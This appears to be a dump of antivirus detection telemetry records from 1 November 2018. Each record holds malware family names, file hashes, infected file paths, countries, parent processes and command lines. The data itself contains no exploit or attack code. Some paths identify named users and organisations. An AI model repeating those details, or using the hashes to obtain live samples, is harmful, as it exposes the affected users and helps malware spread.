  Row(detection=Row(filename='7-zip.dll', filepath='D:\\the lasted software\\ansys step\\X64\\util\\7zip\\7-zip.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='5396834fe20eb5d62c841f3f383ea7c0fbdeb93496119aca02b5650f8a9e9073', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-01T21:08:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='13bf13b9e7e3fca3a3eba08a2eaa469ff266a920bbc8069e270c43b61777c90e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries28.10.2018-4.available\\Avira\\13BF13B9E7E3FCA3A3EBA08A2EAA469FF266A920BBC8069E270C43B61777C90E', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='13bf13b9e7e3fca3a3eba08a2eaa469ff266a920bbc8069e270c43b61777c90e', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T05:21:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='diner das1h.exe', filepath='\\?\\J:\\العاب2\\الطباخه\\Diner Das1h.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='1d829dace0c81447940ca69d6dbd0f054fad719994a9bbd763595d21306c64c2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155950-e8792217', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155950-E8792217', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:34:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='januari.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2016\\RPG\\NOTULEN MEETING P2K3\\JANUARI\\JANUARI.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ff_tomsmocomp.dll', filepath='E:\\暴风影音\\codec\\ff_TomsMoComp.dll', filesize=4160000, name='W32/Ramnit.CD.#M1.#R1'), hash='0640858091c79cfc0c34b4d19e378baff12bdcd2ce782ea93ed5790a6d3eb6c7', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-01T12:09:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pengangkatan karyawan.bat', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\RPG\\SURAT PENGANGKATAN KARYAWAN\\PENGANGKATAN KARYAWAN.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:23:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T01:00:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155729-d0b4c75f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155729-D0B4C75F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T07:59:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msinfo32.exe', filepath='\\\\?\\C:\\Windows\\system32\\msinfo32.exe', filesize=320000, name='W32/Virut.Gen.#M1.#R1'), hash='d8213db326927daea127aab9eca9553efdc173c1a3137c132564ec7ac71ec05b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:32:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b116900bf58998f4fe2a52084bc92182715b67cf2fa3585d583464cf25919455', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B116900BF58998F4FE2A52084BC92182715B67CF2FA3585D583464CF25919455', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b116900bf58998f4fe2a52084bc92182715b67cf2fa3585d583464cf25919455', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b3be752d9d1ff652c4b9676ba3a22f004649e5c0855e4801ff3ee5ab0b773063', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B3BE752D9D1FF652C4B9676BA3A22F004649E5C0855E4801FF3EE5AB0B773063', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b3be752d9d1ff652c4b9676ba3a22f004649e5c0855e4801ff3ee5ab0b773063', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.android.vending.exe', filepath='G:\\Android\\data\\com.android.vending.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC E-GOVERNANCE SERVICES INDIA LIMITED\\DIGIPAY\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T08:13:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cvefw211.exe', filepath='C:\\compartilhado\\Exawin\\CVEFW211.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='62d36f637b856db0f860a50a7b6f691f1be4342d4e21c69ee520024f2c78656c', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:57:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bitcomet_1.44_setup.exe', filepath='D:\\Computers Games\\software\\BitComet_1.44_setup.exe', filesize=16316000, name='TR/Patched.Ren.Gen.#M300.#R7636'), hash='bf1055ce1b58b72903e38ff93917af1d2a4d35614e12729d0ea0f03383a5971a', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T10:16:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='deep voyage.exe', filepath='\\?\\J:\\العاب2\\Deep Voyage\\Deep Voyage.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='555ad99c4b9ad6dd72f0449f9fe2c78d6142d25ca3e7d644604769e111ce98da', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:06:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\nhm_windows_1.9.0.7\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe149_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe149 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='NO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T10:02:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e69d066f2cd3336846a2fb31e3ad342c0c4e1960ede10407e064706a3d545c05', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\E69D066F2CD3336846A2FB31E3AD342C0C4E1960EDE10407E064706A3D545C05', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e69d066f2cd3336846a2fb31e3ad342c0c4e1960ede10407e064706a3d545c05', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:47:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.23403_none_75f4c7b492ce2cb7\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='920b14c64024160f12e05747f3b2976ef33d16e4bcb83d447bc7fa0380007d70', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:34:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\BTG-nVidia.miner.0.3.4b\\BTG-nVidia.miner.0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:DwxSvuTmT06Qv2NJ.1', country='BN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T20:24:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ae6c89ba33fb3fb7c0ecffcde0ffdc3501b4fe3d405f1d1fef94c6c9b4aa7627', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T13:56:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:54:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rkbatchtool.exe', filepath='E:\\Box Files\\SPDMTK_FILES\\Torque\\DROIDZ DUO Slim\\Rockchip_Batch_Tool_v1.7\\Rockchip_Batch_Tool_v1.7\\RKBatchTool.exe', filesize=1024000, name='W32/Sality.AG.#M1.#R1'), hash='b51869f1de40bbb17a0f5f60dda65df7887ea8772d17f3e7a3a6bf06f15d922d', metadata=Row(cmdline='\\\\\\/onboot', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WWW.HOSTJSC.NET\\Internet Download Manager\\IDMan.exe', parentsize=990720, timestamp='2018-11-01T06:34:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-201530-e21cad2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_367675be\\AVSCAN-20181101-201456-DBFF583E\\AVSCAN-20181101-201530-E21CAD2D', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='c7d7d2b9f9b9bc1a730902c629ee706043e35f9d31f3ef5845c0736e8600226b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:13:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-122431-0f552d33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-122401-F5F8F33C\\AVSCAN-20181101-122431-0F552D33', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:24:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='eb64c005f597654677fe378d8ffff30c3912e5887668d03acccb84c94ba7929e', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T00:49:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack.exe', filepath='C:\\Program Files (x86)\\The_Secret_0.1.2.2\\crack\\crack.exe', filesize=7936000, name='TR/Crypt.TPM.Gen.#M300.#R2977'), hash='77c91e39fd62c026c8a45d51bc5f65370b38bc1bffc700fae82bada75dbcfba6', metadata=Row(cmdline='-el -s2 \\\\\\"-dC:\\\\\\\\Program Files (x86)\\\\\\\\The_Secret_0.1.2.2\\\\\\" \\\\\\"-sp\\\\\\"', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='E:\\FINISHED\\New folder\\The_Secret_0.1.2.2\\The_Secret_0.1.2.2.exe', parentsize=2744250324, timestamp='2018-11-01T01:43:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='казына.exe', filepath='D:\\казына\\казына.exe', filesize=512000, name='TR/Chydo.TF.#M1.#R1'), hash='e3460c24a1aa8b9a9694490074b672fd95f10e62f5467b2503cfb7fcd43e73da', metadata=Row(cmdline=None, country='KZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:28:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150242-6a386525', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b75d2d4a\\AVSCAN-20181101-145846-52D79F1B\\AVSCAN-20181101-150242-6A386525', filesize=896000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='5a279b0324f5bda0d1dd288ca567445cfc40f47a4cdd734409cc836ffa2664a1', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:33:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='7d3b3b7dd8a1433488fe97914613de0b3f0141c1c9d716c7c0f3b6ddcba70f01', metadata=Row(cmdline='-k secsvcs', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T10:09:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000058bd', filepath='C:\\Windows\\Temp\\b9c725ca-8813-4921-9644-afda38180063\\tmp00000473\\tmp000058bd', filesize=12800000, name='TR/Crypt.EPACK.Gen2.#M300.#R100581'), hash='83e8223c2252612c9fd32083ff20098b1fc19d3f46c044536081a4e6d408014f', metadata=Row(cmdline=None, country='GB', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Cino\\Programy\\Ad-Aware Antivirus\\11.11.898.9090\\AdAwareService.exe', parentsize=730496, timestamp='2018-11-01T12:07:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-181025-6b8aa38f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_880a91d2\\AVSCAN-20181101-180900-5AE697AD\\AVSCAN-20181101-181025-6B8AA38F', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:10:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-195009-f093ed72', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9b59c424\\AVSCAN-20181101-194958-EE6059EA\\AVSCAN-20181101-195009-F093ED72', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:50:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0119723.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119723.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:39:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-215907-12a26fa5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c482a580\\AVSCAN-20181101-215743-0A5557A2\\AVSCAN-20181101-215907-12A26FA5', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:59:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='5e2eb25e78fa1b55d74c463d02c2ceac8d0abbe008e98b793baef7a87ecaeb32', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.categorizing\\5E2EB25E78FA1B55D74C463D02C2CEAC8D0ABBE008E98B793BAEF7A87ECAEB32', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='5e2eb25e78fa1b55d74c463d02c2ceac8d0abbe008e98b793baef7a87ecaeb32', metadata=Row(cmdline='-r', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-01T11:12:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T11:58:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-092128-07f305ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0325020e\\AVSCAN-20181101-090025-3A08BDB6\\AVSCAN-20181101-092128-07F305AE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3fbd0949102ca02550802993e8aca7e6f5ef05cd2bfd352a87267e558363367d', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:21:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='blackstorm.dlr', filepath='\\\\?\\C:\\Program Files\\Autodesk\\3ds Max 2014\\stdplugs\\BlackStorm.dlr', filesize=576000, name='TR/Crypt.XPACK.Gen.#M300.#R7269'), hash='24296f07b2db13327c95a6547a6c0d82387a8476158e8bf57a3931f68293d379', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:45:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-001051-9ffdbbf2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-230344-574DB10D\\AVSCAN-20181102-001051-9FFDBBF2', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:10:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion[1].dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\I3NV3OLU\\Fusion[1].dll', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:30:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000911b3', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000911b3', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:46:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-212905-3edbba10', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7c7c7446\\AVSCAN-20181031-212222-0B575682\\AVSCAN-20181031-212905-3EDBBA10', filesize=2560000, name='ADWARE/MultiPlug.Gen7.#M1.#R1'), hash='5a7acc1b9a0b1ab1ab25f47e7cb5c1cbeb28e5d414c854f8848f993f87bc30f9', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T00:29:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1e3b63decae53421533d2730525f0e5baad0ce4b63e19e2a77cdecab1b4da15c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1E3B63DECAE53421533D2730525F0E5BAAD0CE4B63E19E2A77CDECAB1B4DA15C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1e3b63decae53421533d2730525f0e5baad0ce4b63e19e2a77cdecab1b4da15c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:23:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='english.exe', filepath='F:\\New folder\\Corel Draw 12\\English\\English.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:18:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181103-005156-061f873d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0676114b\\AVSCAN-20181103-004831-E7F528C3\\AVSCAN-20181103-005156-061F873D', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:16:57Z'), dt=datetime.date(2018, 11, 1)),
